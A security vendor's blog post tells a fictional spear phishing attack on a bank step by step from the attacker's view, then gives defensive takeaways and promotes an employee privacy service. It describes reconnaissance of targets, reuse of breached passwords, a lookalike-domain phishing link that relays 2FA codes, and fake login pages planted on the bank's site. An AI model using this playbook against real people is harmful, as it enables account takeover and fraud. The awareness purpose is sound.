The Anatomy of Spear Phishing Attacks
While common email tools and cybersecurity firewalls are getting better at filtering out egregious of phishing attempts, highly-personalized and effective spear phishing attacks remain a threat.
Today’s successful spear phishing emails are nearly indistinguishable from emails sent by legitimate vendors, customer support teams, and the thousands of other emails organizations receive on a daily basis.
Spear Phishing targets outsized payoffs – they attempt to steal tens, and sometimes hundreds of thousands of dollars.
Given that priming employees on phishing does not seem to reduce successful phishing attempts, spear phishing is likely to remain a threat to organizations irrespective of their investment in employee training or cybersecurity protocols.
And these attacks aren’t slowing down.
According to the APWG, phishing attacks reached new quarterly highs each quarter of 2022, raising from slightly over 1 million in Q1 to over 1.2 million by Q3.
Notably, this rise was due to “a large number of attacks from a few persistent phishers” on “specific targets.”
Ironically, the leading medium of successful organization attacks a low-tech manual effort that’s not at all accounted for by the downstream cybersecurity arms race.
This is a big surprise for many Privacy Bee customers, who are surprised to learn the lengths that spear phishers go to when planning and deploying their attacks.
Attackers are dedicated, persistent, and highly motivated by outsized potential payoffs. They’re uniquely, maliciously creative.
Whether attackers attempt extortion, or fraudulent wire transactions, or another nefarious end goal, initial spear phishing emails are often the main entry point into an organization.
Reconsidering the Story of a Successful Spear Phishing Attack
We’ve found the narrative and the timeline of a spear phishing attack is not often well understood. That’s what we hope to address in this piece. We’ll explore how such targeted, sophisticated attacks are put together, so we can better discuss effective defense strategies.
By way of example, we’ll break down what a modern successful attack could look like, in thorough detail. This article will tell the story of a (fictitious) modern spear phishing attack, including characters, timelines of events, and the real tools they would use.
If this attacker is successful in breaching your organization, your business stands to lose millions directly, and many millions more to damages.
The Anatomy of a Successful Spear Phishing Attack
The average cyber attack unfolds over about 367 days, and attackers targeting organizations generally follow the same 6 steps:
- Reconnaissance: Scope the digital landscape for possible targets/organizations.
- Identify Weaknesses: The most exploited organizational vulnerability is External Data Privacy; often this phase includes compiling a list of employees who have sufficient digital exposure.
- Research Targets: Collected information can be taken from personal social profiles, previous data breaches, or data brokers.
- Create Payloads: While often crafted as targeted messages, payloads, and delivery methods can vary widely.
- Intrusion Attempt: Deliver payload, attempting to breach the organization.
- Data Breach: Having successfully delivered their payload, perhaps by spear phishing, your organization has been breached, and is exploited.
Notably, long before an intrusion attempt is made, attackers have already targeted your organization and very likely have selected specific employees to target.
The only commonality between attackers is their end goal. 93% of breaches on organizations are financially motivated.
What the attack looks like and how it’s delivered varies. Attackers have compromised HR logins to redirect entire payrolls. They’ll swipe business credit credentials to purchase digital gift cards. Sometimes, they’ll conduct covert business espionage and sell their findings to the highest anonymous bidder.
The first step is always reconnaissance – taking a broad look at the digital landscape, to assess opportunities.
Step One: Reconnaisance
(0 – 30 days)
By way of example, assume an attacker wants to gain access to a financial services firm. They plan to convert fraudulent transfers from the platform or its customers into cryptocurrency.
In our case, our attacker has begun with the end in mind, more or less. They want access to a bank, or financial services platform, in order to steal funds through a wire and purchase cryptocurrency on an unregulated exchange.
If they pull that off, they can “tumble” (launder) the digital currency to achieve relative anonymity.
They know they only want to target companies of a certain size (100 to 1,000 employees.) These organizations have more digital exposure and of course, more funds to steal. Our attacker did his homework and pulled together a list of about 200 possible target companies.
As the attacker, you would now set out to determine:
- Which organizations are most vulnerable to attack?
- Which people have sufficient accesses/permissions, and what can I learn which might make them easy targets?
Step Two: Identify External Data Weaknesses
(30 – 60 days)
With a list of potential target organizations, you (the attacker) begin prodding the surface-level web presence of the companies and their people. You’re also keeping an eye out to identify individual attack targets.
This can be more time-consuming. Ultimately, you intend to deliver a spear phishing email that gives you access to sensitive login details.
You start with a scrape of the companies’ LinkedIn pages, to find people with specific job titles.
One such LinkedIn page is for a mid-sized West Coast Bank. You’ve pulled a list of 605 of their employees, narrowed those down by job titles, and end up with a list of 20 employees who might have the right authority to the bank’s website admin, banking platform admin, or both.
This is a fine start. You decide to dig in.
Step Three: Target External Data Research
(30 – 180 days)
Cybersecurity experts, IT Teams, and CISOs operate on constant alert, ready to jump on an attack or breach the moment one is identified.
Not you. The nice thing about being a “bad actor” is that you get to operate on your own schedule. Patience and time are your allies, unlike your opposition.
Among other things, this means you can afford to take your time to build a detailed understanding of your potential targets. For example, you can track down all 20 people’s social media profiles and monitor them for a few weeks.
One such profile is Amanda Smith, a fictional Marketing associate in fictional Acme Bank’s West Coast offices. Amanda was married the Fall. She posts photos of her dog Tipper, in a condo in Calabasas, on her public Instagram account.
With about 30 minutes of review, you’ve built a decent profile on Amanda. You plug her details into a spreadsheet alongside which you’ve collected data on dozens of other possible targets.
| Value | Notes |
|---|---|
| Title | JR. HR Associate |
| Social Handle | @fakeAmanda |
| Phone Number (verified) | |
| Notes | Dog named Tippy. Condo in Calabasas. Newlywed (to Tom). Graduated Santa Barbra 2018. Travels with Friends (Martha, Tom, Jim) Friends/associates with Mark Jones (Head of Marketing & Comms) |
After plugging in her social profile to a tool like Apollo, you flesh out Amanda’s details with her personal email address, more social accounts, previous employer, family members’ names, and her cell phone number.
Finding Your Real Attack Target
One of the biggest discoveries during your research is that Amanda often posts photos with her team, including the Head of Marketing and Communications Mark Jones (a great target), at after-hours work hangouts. They seem close.
But your access him is limited. His profiles are private, and he seems to be relatively inactive on social media. You’ve scoured data brokers and People Finders, but have found no obvious vulnerabilities.
Amanda is a different story.
Matching Legal Data with Illegal Data to Get Results
Having gleamed what you can from Amanda’s social profiles, you turn turn to the dark underside of the web to see what can be found.
Nefarious organizations buy and sell large swaths of data – including breachd passwords and associated email addresses – on the dark web.
Amanda’s personal email password was exposed once – in the Yahoo data breach of 2013. You bought an old database of hundreds of thousands of emails and passwords for a little over $20 USD.
Not surprisingly though, that email password has been changed. It didn’t work for her personal or work email addresses.
But as a semi-sophisticated attacker, you’ve learned every possibility is worth a shot.
So you open Instagram, plug in her username and try the outdated password you found.
It works.
No two-factor authentication enabled – you are now logged into Amanda Smith’s Instagram. A bit giddy now, you scour personal DM’s, where you find off-the-record work gripes with Mark Jones.
You’re also not a fool, so you don’t do anything that will leave a trace. You leave your burner phone logged in – content to monitor for weeks, or months, on end.
You’re waiting for the right time, to send the right message.
Step Four: Crafting the Spear Phishing Message
(Day 60 – 270)
A few weeks have gone by.
You’ve determined Mark Jones (the fictional Head of Marketing) would be a great final target.
After kicking around a few different options, you’ve decided to try to use a login collection screen to get access to Mark Jones’ Gmail.
Building a fake login screen is easy. The difficult part will be getting Mark to submit his login information, unwittingly.
This is where your research and preparation pay off. Your best shot is to try to slip a spear phishing message through – via Amanda’s Instagram.
You’ve learned quite a bit about Amanda and Mark over the past few weeks.
From public-facing social profiles alone, you know their team gets food together after working hours once every other week.
Mark and Amanda have worked together for about 3 years. Their team is pretty small – a maximum of 5 people. Amanda is frequently writing on the bank’s blog, and the team structure suggests she reports directly to Mark.
That’s all you need to know.
In the early hours of the morning, you turn off notifications for Amanda’s Instagram through in-app settings.
Then you message Mark.
Step Five: The Data Breach Intrusion Attempt
“Hey Mark, are we in this meeting together? {gool.cal.co/alfkds}”
Now, you wait with bated breath. The link looks legit – but cal.co is a random domain you purchased, set up with a subdomain of “gool.” The site hosts your fake Gmail login page.
After inputting his email and password, Mark will receive a real 2-factor authentication code from Google. That code will come from you – because you plugged them into the real Google login.
He’ll submit that code to your fake login page as well. This is sent directly to you, in plain text, and you’ll plug it into the real Google login.
Bingo. You’re in.
To cover your tracks a bit, Mark is finally redirected from your fake login with a brief “success message” to calendar.google.com.
Only 3 minutes later, Mark writes back: “hm, which meeting? I can’t tell.”
You erase both messages from Amanda’s Instagram and re-enable notifications. You also forward your phishing domain permanently to calendar.google.com.
She’ll see nothing if she checks her phone. Mark will be sent to calendar.google.com if he ever clicks the link again. He might make a remark to Amanda in passing, but hopefully, they’ll each write it off as a miscommunication.
If they do notice, it won’t matter much to you. With your login successfully phished, you only require days or hours to complete your attack.
Step Six: Data Breach and Attack
(24 – 48 hours)
It may only be a matter of time before Mark and Amanda realize something is up and notify their cybersec team.
To complicate matters, after searching Mark’s inbox, it doesn’t seem he has any access directly to the banking platform.
But he does appear to be the WordPress administrator. A simple password reset is all you need to gain edit permissions for the bank’s website.
In a little under 90 minutes, you and an accomplice have crafted some good-looking customer login pages, almost identical to the bank’s own login screens. You deploy these to the bank’s website, on the bank’s own domain.
Just like you did with Gmail, you’ll collect every login that comes through in plain text, and you and your buddy will use that to log into the customer’s bank account.
Customers are sure to be upset if they can’t access their banking platform, and thus you cover your tracks again with a redirect to the original login screen. For at least a few hours, or perhaps even a couple of days, this subtle shift will go unnoticed by the bank’s staff.
In the time that your false login screen is live on the bank website, a little over 100 banking customers have attempted to log in through these phony profiles. Quietly, you remove it.
Late and night and early in the morning, you and your pals begin logging into accounts and executing small, fraudulent wire transactions.
To buy some time, you disable website support windows and change phone numbers. If you can keep the bank unaware for even just 48 hours, there’s a very strong chance you’ll get away with your money.
The Fallout of a Successful Spear Phishing Attack
It’s about a day after your first wire that the bank begins to realize something is terribly wrong. They’ve begun freezing wire transactions, but as they don’t understand the extent of their breach, it’s a full 72 hours before they stop all transactions.
The cybersecurity team works overtime to trace the source of the breach back to Amanda and Mark – by day 3 they’ve discovered the traces of your malicious login pages.
Meanwhile, you’ve wired about half the stolen funds successfully. Those funds have already landed with a cryptocurrency exchange, and you’re nearly in the clear.
You still may not actually get away with this. Federal investigators are clever. It’s still likely that they tie this back to you, and perhaps they’ll recoup some of the funds. Half of all cases like these recover 93% of the total financial losses. Then again, 14% recover nothing at all.
But that’s to say nothing of the indirect and personnel costs suffered by the bank.
Alongside Amanda, the Bank’s CISO and immediate report are let go in the following weeks. The rehire costs for those two alone amount to hundreds of thousands of dollars. Their individual personal and career losses might be greater.
Then there’s the sheer loss of integrity the bank suffers in their customers’ eyes. The breach is disclosed to their clients, and in the subsequent weeks, hundreds of customers move a sum of hundreds of millions out of the bank. The shrinkage and stalled growth over the next few years will result in company-wide layoffs.
Of course, none of this matters much to you, the attacker. If you got away, perhaps with a few hundred thousand of untraceable funds, you consider this a job very well done. And you’re ready to lie in wait, for months or years more, until a new opportunity arises.
Cybersecurity Takeaways
This somewhat dramatic retelling does offer some important insights.
Notably, CISO and cyber security teams were not involved until post-breach. Time to detection, in this case, was only a few days; in about 20% of cyber attacks, detection takes months or more.
Another important note is long the path of attack ultimately looks. This is also common. Each subsequent successful exposure/breach enables further, more damaging breaches, and each subsequent stage of attack relied on the initial human layer.
- Personal Credential Compromise (Instagram)
- Spear Phishing Message (The Human Element)
- Business Email Compromise
- Customer Credential Compromise
- Fraudulent Wire Transactions
It was the attackers’ significant access to personal details about Amanda and Mark, in particular, that enabled the initial breach into Mark’s email address.
Without significant External Data – background research on the employees, compromised personal logins, and an understanding of the personal relationships between team members – this kind of attack would not have been possible.
Most importantly, this example highlights the breadth of the risks presented at this social layer – the ultimate means and medium of attacks vary so greatly, they’re impossible to thoroughly predict or plan around.
Properly diversified Defense Strategies must take proactive approaches to mitigate the risks of social engineering or spear phishing.
Privacy Bee Removes Initial PII Exposures to Prevent Social Attacks
One such proactive defense strategy is an investment in employee data privacy.
Privacy Bee is a proactive employee privacy platform that helps CISOs, IT teams, and CTOs discover and reduce their employee’s privacy risks.
We scan the surface-level web for PII exposures across your teams, highlight and explain significant threats, and then advocate on your team’s behalf to remove data from data brokers, data breaches, and other sources. By reducing your exposures now, you prevent attackers from finding avenues of exploitation and reduce human error.
To see how it works, start a free Employee privacy scan to see how exposed your team is. Or sign up for a free demo.
